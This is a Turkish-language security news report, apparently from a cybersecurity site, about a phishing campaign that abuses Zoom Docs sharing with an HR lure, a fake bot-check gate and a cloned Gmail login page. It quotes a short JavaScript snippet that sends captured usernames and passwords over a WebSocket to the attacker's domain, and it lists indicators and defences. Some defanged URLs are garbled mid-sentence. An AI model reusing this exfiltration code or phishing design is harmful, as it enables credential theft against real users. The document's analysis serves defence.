“HR”den gelen görünüşte meşru bir Zoom belgesi paylaşımı, kurbanları sahte bir bot koruma kapısı üzerinden Gmail giriş kimlik avına yönlendirdi. Kullanıcı kimlik bilgileri WebSocket aracılığıyla canlı olarak sızdırılır ve gerçek zamanlı olarak doğrulanır.
Bu rapor, sosyal mühendisliği, kötü amaçlı altyapıyı, kavram kanıtı sızma kodunu ve dikkat edilmesi gereken güvenlik ihlali göstergelerini ayrıntılı olarak ele alıyor.
İş arayanlar ve çalışanlar, belge paylaşımı için Zoom bildirimlerine benzer şekilde güveniyor. Yakın zamanda yaşanan bir olayda, geçerli bir Zoom Docs adresinden “İK başvurusu” başlıklı bir e-posta geldi. SPF, DKIM ve DMARC’nin tümü denetimden geçerek alıcıyı sahte bir güvenlik duygusuna kaptırdı.
Bağlantı standart bir Zoom belgesi URL’si olarak görünüyordu ancak gerçekte hxxps://overflow.qyrix’e işaret ediyordu.[.]com.de/GAR@bBWe/, “Onaylamak için Basın ve Basılı Tut” bot koruma widget’ını barındıran bir sunucu.
Daha ayrıntılı bir incelemede, belge bağlantısının, klasik Gmail kimlik bilgisi toplama sayfasına yönlendiren site dışı bir sayfaya yönlendirdiğini fark ettim.
Geçidi geçtikten sonra kullanıcı hxxps://overflow.qyrix adresine yönlendirildi.[.]com.de/aoi99lxz7s0?id=02efd7fc7…, burada Gmail giriş kullanıcı arayüzünün bir kopyası kimlik bilgilerini bekliyordu. Dönüşüm hunisinin tamamı, tıklama oranlarını en üst düzeye çıkarmak ve ilk şüpheleri önlemek için Zoom’un güvenilir platformundan yararlandı.
Teknik Analiz
Kimlik avı sayfası yalnızca Gmail’in arayüzünü taklit etmekle kalmadı, aynı zamanda gerçek zamanlı veri hırsızlığı için bir WebSocket bağlantısı da kullandı.
Kimlik bilgileri girildiğinde aşağıdaki kod parçası, saldırganın komuta ve kontrol sunucusuna canlı bir kanal oluşturur:
javascriptconst ws = new WebSocket('wss://overflow.qyrix.com.de/ws');
ws.onopen = () => {
const payload = JSON.stringify({ user: username, pass: password });
ws.send(payload);
ws.close();
};
Yakalanan WebSocket çerçeveleri, kullanıcı adlarının ve şifrelerin anında sızdırıldığını doğruladı. Arka uçta, kimlik bilgileri Google kimlik doğrulama API’sine göre doğrulanır, bu da statik kimlik avı sayfalarıyla karşılaştırıldığında hafif gecikmeyi açıklar.
Bu iki aşamalı doğrulama, saldırganların geçerli oturum açma bilgilerini anında gerçekleşen hatalardan ayırmasına olanak tanıyarak, kötüye kullanımın takip edilmesini veya hesabın ele geçirilmesini hızlandırır.
Önleme Stratejileri
Zoom.us dışındaki bir alan adına işaret eden herhangi bir Zoom paylaşım bağlantısı şüpheli olarak değerlendirilmelidir. Giriş yapmadan önce “Basılı Tut” doğrulamasının veya herhangi bir testin varlığı, Google’ın kimlik doğrulama akışına uygun değildir.
SOC analistleri, tarayıcılardan gelen beklenmedik giden WebSocket (ws:// veya wss://) bağlantılarını izlemelidir. E-posta ağ geçitlerinde URL yeniden yazma ve etki alanı itibar kontrolleri, hxxps://overflow.qyrix.com.de adresini kötü amaçlı olarak işaretleyebilir.
Kimlik bilgileri gönderildiyse, resmi Google sitesi aracılığıyla şifrenin anında sıfırlanması ve ardından iki faktörlü kimlik doğrulamanın etkinleştirilmesi zorunludur.
Kullanıcılar, Gönderen alanının bağlantı alan adıyla eşleştiğini doğrulamak için tam e-posta başlıklarını incelemelidir. Güvenlik ekipleri kötü amaçlı etki alanını DNS veya proxy düzeyinde engelleyebilir.
Zoom’un kötüye kullanım portalına ve Google’ın kimlik avı rapor formuna ekran görüntüleri ve başlıklarla birlikte bildirimde bulunmak, yayından kaldırma çabalarına yardımcı olacaktır. Parola yöneticilerinin kullanımını teşvik etmek, alan dışı sayfalarda kimlik bilgilerinin otomatik olarak doldurulmasını reddedecekleri için başka bir savunma hattı daha ekler.
Sonuç olarak, Zoom’un belge paylaşım özellikleri işbirliğini geliştirirken, karmaşık kimlik avı kampanyaları için güvenilir bir vektör olarak kötüye kullanılabilir.
Hızlı bir URL sağlık kontrolü, başlık incelemesi ve olağandışı doğrulama adımlarına ilişkin farkındalık, gelen kutunuzu ve kimlik bilgilerinizi bu kötü niyetli İK maskesinden koruyabilir.
Anında Güncellemeler Almak ve GBH’yi Google’da Tercih Edilen Kaynak Olarak Ayarlamak için bizi Google Haberler, LinkedIn ve X’te takip edin.